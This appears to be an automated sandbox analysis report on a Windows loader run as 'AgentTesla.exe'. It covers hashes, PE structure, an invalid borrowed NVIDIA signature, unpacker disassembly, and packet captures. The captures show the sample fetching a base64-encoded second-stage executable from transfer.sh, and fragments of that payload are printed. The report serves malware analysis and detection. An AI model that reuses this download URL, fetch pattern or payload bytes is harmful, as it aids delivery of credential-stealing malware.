                            SHA256:c92c2d345803369fe8d343b1c894c1dc82e0c8b855c83d3cdb07c179e108aa78
                            SHA512:b837e64b20669f892fb9ee1da48d97916ebaf65b900d8d8164fdb3a18a547b2ea6c92a5175939b79d6a67a19b3660000e51e84ed70d30561ac5c0a03805dd7be
                            SSDEEP:98304:0KgT8+7CuQJKJoDgnggMMCFnUudG2CSLOG5ADU9Z8RNCjjTGFGzPhG0:sT8+7h/WMnggMbxUudB3A8INCzGeJ
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:..b.....................v%.....X@... ... ....@.. ................................n...`................................
                            Icon Hash:b07064e6c6c69c8e
                            Entrypoint:0xd44058
                            Entrypoint Section:.boot
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, HIGH_ENTROPY_VA
                            Time Stamp:0x622EEB3A [Mon Mar 14 07:14:02 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:4328f7206db519cd4e82283211d98e83
                            Signature Valid:false
                            Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                            Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                            Error Number:-2146762495
                            Not Before, Not After
                            • 9/1/2011 5:00:00 PM 9/1/2014 4:59:59 PM
                            Subject Chain
                            • CN=NVIDIA Corporation, OU=Software, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                            Version:3
                            Thumbprint MD5:CBD07103D9E8DF2383EE16E696B15D6D
                            Thumbprint SHA-1:579AEC4489A2CA8A2A09DF5DC0323634BD8B16B7
                            Thumbprint SHA-256:21C13D0A5037EBB97EB9AE094D8D5839B4BC9BBA751C848064C82EC3A42A3134
                            Serial:43BB437D609866286DD839E1D00309F5
                            Instruction
                            call 00007FA720A465D0h
                            push ebx
                            mov ebx, esp
                            push ebx
                            mov esi, dword ptr [ebx+08h]
                            mov edi, dword ptr [ebx+10h]
                            cld
                            mov dl, 80h
                            mov al, byte ptr [esi]
                            inc esi
                            mov byte ptr [edi], al
                            inc edi
                            mov ebx, 00000002h
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            jnc 00007FA720A4646Ch
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            jnc 00007FA720A464D3h
                            xor eax, eax
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            jnc 00007FA720A46567h
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            adc eax, eax
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            adc eax, eax
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            adc eax, eax
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            adc eax, eax
                            je 00007FA720A4648Ah
                            push edi
                            mov eax, eax
                            sub edi, eax
                            mov al, byte ptr [edi]
                            pop edi
                            mov byte ptr [edi], al
                            inc edi
                            mov ebx, 00000002h
                            jmp 00007FA720A4641Bh
                            mov eax, 00000001h
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            adc eax, eax
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            jc 00007FA720A4646Ch
                            sub eax, ebx
                            mov ebx, 00000001h
                            jne 00007FA720A464AAh
                            mov ecx, 00000001h
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            adc ecx, ecx
                            add dl, dl
                            jne 00007FA720A46487h
                            mov dl, byte ptr [esi]
                            inc esi
                            adc dl, dl
                            jc 00007FA720A4646Ch
                            push esi
                            mov esi, edi
                            sub esi, ebp
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x26c03a0x50.imports
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x25736a.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x6ea1d00x1310.winlice
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x20000x100000x7092False1.00027760428data7.95088629607IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rsrc0x120000x25736a0x257400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x26a0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .imports0x26c0000x20000x200False0.16796875data1.14864242974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .winlice0x26e0000x6d60000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .boot0x9440000x48b4000x48b3c9unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x125c00x2868dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x14e280x16e8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x165100xa68dataEnglishUnited States
                            RT_ICON0x16f780x668dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x175e00x2e8dataEnglishUnited States
                            RT_ICON0x178c80x1e8dataEnglishUnited States
                            RT_ICON0x17ab00x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x17bd80x4a6dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x1c6480x4c28dataEnglishUnited States
                            RT_ICON0x212700x2ca8dataEnglishUnited States
                            RT_ICON0x23f180x1628dataEnglishUnited States
                            RT_ICON0x255400xea8dataEnglishUnited States
                            RT_ICON0x263e80x8a8dataEnglishUnited States
                            RT_ICON0x26c900x6c8dataEnglishUnited States
                            RT_ICON0x273580x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x278c00x5286PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x2cb480x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x3d3700x94a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x468180x4228dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x4aa400x25a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                            RT_ICON0x4cfe80x10a8dBase III DBT, version number 0, next free block index 40, 1st item "\252]\030\251\253\\030\377\253\\030\377\252[\027\377\252Z\027\377\251Z\030\377\251Y\030\377\250Y\030\377\247W\027\357"EnglishUnited States
                            RT_ICON0x4e0900x988dataEnglishUnited States
                            RT_ICON0x4ea180x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_RCDATA0x4ee800x219c58PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            RT_GROUP_ICON0x268ad80x148dataEnglishUnited States
                            RT_VERSION0x268c200x2c0data
                            RT_VERSION0x268ee00x2a0dataEnglishUnited States
                            RT_MANIFEST0x2691800x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            DLLImport
                            kernel32.dllGetModuleHandleA
                            mscoree.dll_CorExeMain
                            DescriptionData
                            Translation0x0000 0x04b0
                            LegalCopyrightCopyright 2022
                            Assembly Version1.0.0.0
                            InternalNameDDDHJYUTYE.exe
                            FileVersion1.0.0.0
                            ProductNameDDDHJYUTYE
                            ProductVersion1.0.0.0
                            FileDescriptionDDDHJYUTYE
                            OriginalFilenameDDDHJYUTYE.exe
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Download Network PCAP: filteredfull

                            • Total Packets: 75
                            • 443 (HTTPS)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 14, 2022 17:02:09.002093077 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:09.002146959 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:09.002268076 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:09.374979973 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:09.375013113 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:09.533190012 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:09.533319950 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:09.538209915 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:09.538228989 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:09.538460016 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:09.750186920 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:09.750288010 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.099360943 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.146186113 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821212053 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821244001 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821265936 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821379900 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.821404934 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821465015 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.821583033 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821614981 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821652889 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.821665049 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.821695089 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.821722984 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.843519926 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.843548059 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.843606949 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.843626022 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.843658924 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.843677044 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.844508886 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.844533920 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.844598055 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.844609022 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.844635010 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.844652891 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.845428944 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.845453978 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.845498085 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.845511913 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.845554113 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.845566988 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.865613937 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.865638971 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.865722895 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.865740061 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.865781069 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.865808010 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866192102 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866215944 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866278887 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866292000 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866343021 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866513014 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866543055 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866589069 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866600037 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866631985 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866664886 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866868019 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866892099 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.866955042 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.866966963 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.867014885 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.867321014 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.867346048 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.867394924 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.867405891 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.867455959 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.867470026 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.887655973 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.887681961 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.887833118 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.887854099 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.887918949 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.887937069 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.887962103 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888006926 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888019085 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888060093 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888092995 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888284922 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888308048 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888358116 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888371944 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888411999 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888437986 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888629913 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888655901 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888708115 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888720989 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.888751984 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888781071 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.888997078 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889019966 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889081955 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889096022 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889152050 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889312029 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889342070 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889398098 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889413118 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889444113 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889477015 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889646053 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889678001 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889730930 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889743090 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.889796972 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889825106 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889902115 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.889976025 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.890002966 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.890043974 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.890049934 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.890064001 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.890113115 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.890130997 CET44349767144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.890188932 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.890394926 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.900322914 CET49767443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.906084061 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.906126976 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.906214952 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.906968117 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:10.906979084 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:10.987724066 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:11.016495943 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:11.016522884 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.010796070 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.010833025 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.010839939 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.010885954 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.010914087 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.010998011 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.011018991 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.011044979 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.011071920 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.011415005 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.011437893 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.011518955 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.011532068 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.011563063 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.011590958 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.032758951 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.032788038 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.032876015 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.032895088 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.032947063 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.033418894 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.033463955 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.033478975 CET44349770144.76.136.153192.168.2.7
                            Mar 14, 2022 17:02:12.033518076 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.033576965 CET49770443192.168.2.7144.76.136.153
                            Mar 14, 2022 17:02:12.034535885 CET49770443192.168.2.7144.76.136.153
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 14, 2022 17:02:08.899502993 CET6041253192.168.2.78.8.8.8
                            Mar 14, 2022 17:02:08.918281078 CET53604128.8.8.8192.168.2.7
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Mar 14, 2022 17:02:08.899502993 CET192.168.2.78.8.8.80x3e0Standard query (0)transfer.shA (IP address)IN (0x0001)
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Mar 14, 2022 17:02:08.918281078 CET8.8.8.8192.168.2.70x3e0No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                            • transfer.sh
                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.749767144.76.136.153443C:\Users\user\Desktop\AgentTesla.exe
                            TimestampkBytes transferredDirectionData
                            2022-03-14 16:02:10 UTC0OUTGET /get/jwhuCr/devvvv.txt HTTP/1.1
                            Host: transfer.sh
                            Connection: Keep-Alive
                            2022-03-14 16:02:10 UTC0INHTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Mon, 14 Mar 2022 16:02:10 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 295596
                            Connection: close
                            Content-Disposition: attachment; filename="devvvv.txt"
                            Retry-After: Mon, 14 Mar 2022 17:02:14 GMT
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 127.0.0.1,102.129.143.93,102.129.143.93
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1647273734
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Strict-Transport-Security: max-age=63072000
                            2022-03-14 16:02:10 UTC0INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4a 76 6c 48 57 49 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 51 73 41 41 46 67 44 41 41 41 49 41 41 41 41 41 41 41 41 72 6e 59 44 41 41 41 67 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJvlHWIAAAAAAAAAAOAAAgELAQsAAFgDAAAIAAAAAAAArnYDAAAgAAAAAAAAAABAAAAgAAAAAgA
                            2022-03-14 16:02:10 UTC16INData Raw: 43 6a 4a 41 41 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 43 68 4d 7a 4b 44 67 41 41 41 72 65 41 42 45 49 4b 4e 67 41 41 41 5a 76 78 67 41 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 7a 51 6f 4f 41 41 41 43 74 34 41 45 51 67 6f 33 41 41 41 42 6d 2f 47 41 41 41 4b 33 67 38 6c 4b 44 63 41 41 41 6f 54 4e 53 67 34 41 41 41 4b 33 67 41 52 43 43 6a 41 41 41 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 43 68 4d 32 4b 44 67 41 41 41 72 65 41 42 45 49 4b 4e 30 41 41 41 5a 76 78 67 41 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 7a 63 6f 4f 41 41 41 43 74 34 41 45 51 67 6f 36 67 41 41 42 6d 2f 47 41 41 41 4b 33 67 38 6c 4b 44 63 41 41 41 6f 54 4f 43 67 34 41 41 41 4b 33 67 41 52 43 43 6a 53 41 41 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41
                            Data Ascii: CjJAAAGb8YAAAreDyUoNwAAChMzKDgAAAreABEIKNgAAAZvxgAACt4PJSg3AAAKEzQoOAAACt4AEQgo3AAABm/GAAAK3g8lKDcAAAoTNSg4AAAK3gARCCjAAAAGb8YAAAreDyUoNwAAChM2KDgAAAreABEIKN0AAAZvxgAACt4PJSg3AAAKEzcoOAAACt4AEQgo6gAABm/GAAAK3g8lKDcAAAoTOCg4AAAK3gARCCjSAAAGb8YAAAreDyUoNwAA
                            2022-03-14 16:02:10 UTC32INData Raw: 68 39 41 6a 53 73 41 41 41 45 54 47 42 45 55 48 78 41 52 47 42 59 52 47 49 36 33 4b 42 63 42 41 41 6f 52 47 43 67 62 41 51 41 4b 4b 46 63 43 41 41 59 6f 4c 67 49 41 42 6d 39 34 41 41 41 4b 45 78 38 52 48 69 67 62 41 51 41 4b 4b 46 63 43 41 41 59 6f 4c 67 49 41 42 6d 39 34 41 41 41 4b 45 79 41 52 48 78 45 67 62 78 77 42 41 41 6f 73 44 41 63 52 42 68 45 58 62 7a 30 42 41 41 72 65 47 67 63 4b 33 51 30 42 41 41 41 48 43 74 30 47 41 51 41 41 45 52 55 73 42 78 45 56 62 31 63 41 41 41 72 63 4f 4f 41 41 41 41 41 49 49 41 4e 6d 41 41 42 41 30 51 41 41 41 41 6b 67 43 59 41 41 41 45 44 47 41 41 41 41 63 79 6b 42 41 41 6f 54 49 68 36 4e 4b 77 41 41 41 52 4d 6a 48 78 69 4e 4b 77 41 41 41 52 4d 6b 45 51 55 66 47 42 45 6a 46 68 34 6f 46 77 45 41 43 68 45 46 46 68 45 6b
                            Data Ascii: h9AjSsAAAETGBEUHxARGBYRGI63KBcBAAoRGCgbAQAKKFcCAAYoLgIABm94AAAKEx8RHigbAQAKKFcCAAYoLgIABm94AAAKEyARHxEgbxwBAAosDAcRBhEXbz0BAAreGgcK3Q0BAAAHCt0GAQAAERUsBxEVb1cAAArcOOAAAAAIIANmAABA0QAAAAkgCYAAAEDGAAAAcykBAAoTIh6NKwAAARMjHxiNKwAAARMkEQUfGBEjFh4oFwEAChEFFhEk
